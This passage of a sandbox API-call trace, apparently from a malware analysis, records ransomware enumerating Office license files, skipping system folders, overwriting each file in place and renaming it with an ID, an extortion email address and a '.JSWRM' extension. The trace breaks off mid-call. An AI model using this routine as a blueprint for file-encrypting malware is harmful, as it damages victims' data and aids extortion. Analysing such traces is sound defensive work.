HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.102] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecc61b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecc61b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecd20718, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x50d4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Grace-ppd.xrm-ms", cAlternateFileName="WORDR_~3.XRM")) returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="windows") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.102] lstrcmpiW (lpString1="WordR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241290, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0112.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.103] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20692) returned 1 [0112.103] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50d0) returned 0x24c1d0 [0112.103] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x50d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x50d0, lpOverlapped=0x0) returned 1 [0112.108] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.108] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x50d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x50d0, lpOverlapped=0x0) returned 1 [0112.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.108] CloseHandle (hObject=0x45c) returned 1 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0112.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0112.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0112.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.109] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0112.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.110] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecbef435, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecbef435, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeccadfe3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Grace-ul-oob.xrm-ms", cAlternateFileName="WORDR_~2.XRM")) returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.110] lstrcmpiW (lpString1="WordR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241308, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Grace-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0112.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0112.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.111] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11584) returned 1 [0112.111] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0112.111] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0112.114] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.114] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0112.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.114] CloseHandle (hObject=0x45c) returned 1 [0112.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0112.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0112.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0112.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0112.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0112.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0112.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.115] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0112.116] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecbef435, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecbef435, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xece05550, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2987, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_OEM_Perp-pl.xrm-ms", cAlternateFileName="WORDR_~1.XRM")) returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.116] lstrcmpiW (lpString1="WordR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0112.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241290, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0112.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0112.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.117] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10631) returned 1 [0112.117] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0112.117] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0112.120] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.120] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0112.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.120] CloseHandle (hObject=0x45c) returned 1 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0112.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0112.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0112.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.120] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 